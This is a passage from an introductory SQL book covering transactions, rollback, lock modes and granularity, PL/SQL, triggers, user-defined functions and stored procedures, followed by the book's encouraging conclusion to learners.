simultaneous transactions take place at the same time, only one of them will be successful. Transactions are invisible until they are complete. Whichever transaction completes first will be accepted. The new information displays upon completion of the failed transaction, and at that point, the user must decide if the updated information still requires modification. If there happened to be a power outage and the stability of the system fails, data durability would ensure that the effects of incomplete transactions rollback. If one transaction completes and another concurrent transaction fails to finish, the completed transaction is retained. Rollbacks are accomplished by the database engine using the transaction log to identify the previous state of data and match the data to an earlier point in time. There are a few variations of a database lock, and various properties of locks as well. Lock properties include mode, granularity, and duration. The easiest to define is duration, which specifies a time interval where the lock is applied. Lock modes define different types of locking, and these modes are determined based on the type of resource being locked. A shared lock allows

the data reads while the row or page lock is in effect. Exclusive locks are for performing data manipulation (DML), and they provide exclusive use of a row or page for the execution of data modification. Exclusive locks do not take place concurrently, as data is being actively modified; the page is then inaccessible to all other users regardless of permissions. Update locks are placed on a single object and allow for the data reads while the update lock is in place. They also allow the database engine to determine if an exclusive lock is necessary once a transaction that modifies an object is committed. This is only true if no other locks are active on the object in question at the time of the update lock. The update lock is the best of both worlds, allowing reading of data and DML transactions to take place at the same time until the actual update is committed to the row or table. These lock types describe page-level locking, but there are other types beyond the scope of this text. The final property of a lock, the granularity, specifies to what degree a resource is unavailable. Rows are the smallest object available for locking, leaving the rest of the database available for manipulations. Pages, indexes, tables, extents, or the entire database are candidates for locking. An extent is a physical allocation of data, and the database engine will employ this lock if a table or index grows and more disk space is needed. Problems can arise from locks, such as lock escalation or deadlock, and we highly encourage readers to pursue a deeper understanding of how these function. It is useful to mention that Oracle developed an extension for SQL that allows for procedural instruction using SQL syntax. This is called PL/SQL, and as we discussed at the beginning of the book, SQL on its own is unable to provide procedural instruction because it is a non-procedural language. The extension changes this and expands the capabilities of SQL. PL/SQL code is used to create and modify advanced SQL concepts such as functions, stored procedures, and triggers. Triggers allow SQL to perform specific operations when conditional instructions are defined. They are an advanced functionality of SQL, and often work in conjunction with logging or alerts to notify principals or administrators when errors occur. SQL lacks control structures, the for looping, branching, and decision making, which are available in programming languages such as Java. The Oracle corporation developed PL/SQL to meet the needs of their database product, which includes similar functionality to other database management systems, but is not limited to non-procedural operations. Previously, user-defined functions were mentioned but not defined. T-SQL does not adequately cover the creation of

user-defined functions, but using programming, it is possible to create functions that fit neatly within the same scope as system-defined functions. A user-defined function (UDF) is a programming construct that accepts parameters, performs tasks capable of making use of system defined parameters, and returns results successfully. UDFs are tricky because Microsoft SQL allows for stored procedures that often can accomplish the same task as a user-defined function. Stored procedures are a batch of SQL statements that are executed in multiple ways and contain centralized data access logic. Both of these features are important when working with SQL in production environments.

Conclusion Well, we have come to the end of our journey for now. That was the absolute basics of SQL programming, everything you need to know to make your promotion the success you deserve. As you have seen, SQL is somewhat complicated; it certainly isn’t the easiest of languages to learn! It will require you to focus your full attention on it if you are to understand the basics but, once you have learned them, you will find that it is very easy to build things up and move on another stage. If something doesn’t make sense to you, don’t be afraid to repeat it; go over it and practice the examples until you have a better understanding. The only thing I will say here is don’t ever spend too long on a problem – you won’t grasp it any quicker and are more likely to go backwards. Although you are working on SQL all day long at work, it is quite another matter when you are learning it. The brain will only take in so much information before it can’t go any further so don’t overdo it. Although it can be much to learn, SQL can be a very simple language to use in a database. By taking advantage of the necessary tools in this book, you can successfully maneuver your way throughout any database. It is important to keep in mind that not all formulas work the same in every database and there are different versions listed in the book. Although this has been written with examples of clients or inventory charts, there are many uses for databases. The examples given are not to be taken completely literal. You can use the information in this book to fit whatever your needs are for any database. There is plenty to learn when it comes to SQL, but with the use of practice and good knowledge, you can be as successful as you decide to be in any database. Just how the English language has many rules to be followed, the same applies with SQL. By taking the time to thoroughly learn the language, many things are achievable with the use of a database. Refer back to any of the information in this book any time you are stumped on something you are working on. Although it can be a complex challenge, patience and practice will help you successfully learn SQL. By remembering the basic commands and rules to SQL, you will avoid any issues that can come across most individuals that practice the use of it. It is a lot of information to take in, but instead, take it as

it comes. Go to the practical tools that you may need for whatever you are trying to achieve through the database. When presented with an obstacle or complex assignment, refer to the tools that will clear up what you need. Take time to fully analyze what is before you while also trying to focus on one thing at a time. Keep an open and simple mind when moving forward and you will keep any issues from becoming more complicated than what they need to be. As mention, SQL can be a simple thing to learn. You just need to take the time to understand what everything fully means in depth. If something doesn’t turn out as expected, retrace your tracks to find where you might have inappropriately added a formula and some of the information. By building and maintaining successful problem-solving skills, you will not limit your success. One more thing; don’t ever be afraid to change the data in the examples. It will help you to learn quicker if you can see for yourself what works and what doesn’t. You can see how different results are achieved with different data and you will get a better understanding of how a particular statement might work.

I want to wish you the very best of luck in learning SQL and I hope that that it serves you well in your working life and that is tempts you to move on and learn more about the computer programming languages that every organization loves to use.